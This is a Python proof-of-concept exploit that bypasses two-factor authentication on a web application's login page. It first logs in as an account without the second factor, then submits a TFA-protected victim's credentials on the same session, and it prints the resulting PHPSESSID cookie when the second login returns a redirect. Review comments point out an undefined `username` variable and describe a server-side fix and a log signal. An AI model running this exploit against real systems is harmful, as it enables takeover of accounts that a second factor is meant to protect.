poc.py
import requests
import re
###############################
## Author: Patrik Mayor #
###############################
########## FILL THIS ##########
# Base URL of the application's login page; both the CSRF fetch and the two
# login POSTs are sent to this one address.
url = "http://127.0.0.1/"

# Account WITHOUT two-factor authentication (TFA).
# NOTE(review): the script later reads a `username` variable for this
# account, but this section does not define one.
password = "normaluserpassword"

# Account WITH TFA enabled.
victim_username = "supersecureadminaccount"
victim_password = "supersecureadminaccountpassword"
###############################

# OPTIONAL proxy setting, for example: {"http":"127.0.0.1:8080"}
proxy = {}

# One shared requests.Session, so cookies set by earlier responses are sent
# with every later request in the script.
session = requests.Session()
def get_csrf_token():
    """Fetch the page at ``url`` and return the CSRF token found in it.

    The token is taken from the first match of a pattern that looks for a
    hidden field's ``value="..."`` followed by ``').attr('``; that is,
    the token appears to be embedded in a script snippet rather than in
    plain markup (assumption from the pattern; the page itself is not shown).

    The request goes through the module-level ``session``, so any cookies
    set by this response are kept for later requests.

    If no token is found, a message is printed and the script terminates
    via ``exit()``.
    """
    page = session.get(url, proxies=proxy)
    pattern = r'"hidden" value="(.*?)">\'\)\.attr\(\''
    match = re.search(pattern, page.text, re.IGNORECASE)

    # Guard clause: without a token the login requests cannot be built.
    if not match:
        print("Could not get CSRF token, exiting...")
        exit()

    return match.group(1)
# Step 1: fetch one CSRF token. The same token and the same `session`
# (cookie jar) are reused for both login requests below.
token = get_csrf_token()

# Step 2: log in as the account that has no TFA configured.
# NOTE(review): `username` is not defined anywhere in this listing, so this
# line raises NameError as shown.
first_login = {
    "login_user": username,
    "pass_user": password,
    "csrf_token": token,
}
session.post(url, data=first_login, proxies=proxy)

# Step 3: on the same session, submit the credentials of the TFA-enabled
# account. Redirects are not followed, so the raw status code of the login
# response can be inspected.
second_login = {
    "login_user": victim_username,
    "pass_user": victim_password,
    "csrf_token": token,
}
response = session.post(
    url,
    data=second_login,
    allow_redirects=False,
    proxies=proxy,
)

# The script treats a 302 on the second login as success, presumably a
# redirect into the authenticated area with no second-factor prompt. Neither
# the Location header nor the response body is checked, so the status code
# alone is the only evidence used here.
#
# Defensive reading: a server should discard any existing authentication
# state and issue a fresh session identifier on every login, and should
# decide whether a second factor is required from the account being
# authenticated, not from state already present in the session. Two login
# POSTs with different `login_user` values on one session cookie are a
# useful signal to look for in application logs.
if response.status_code != 302:
    print("PoC does not work!")
else:
    print("PoC works!\n")
    print("PHPSESSID=" + session.cookies["PHPSESSID"])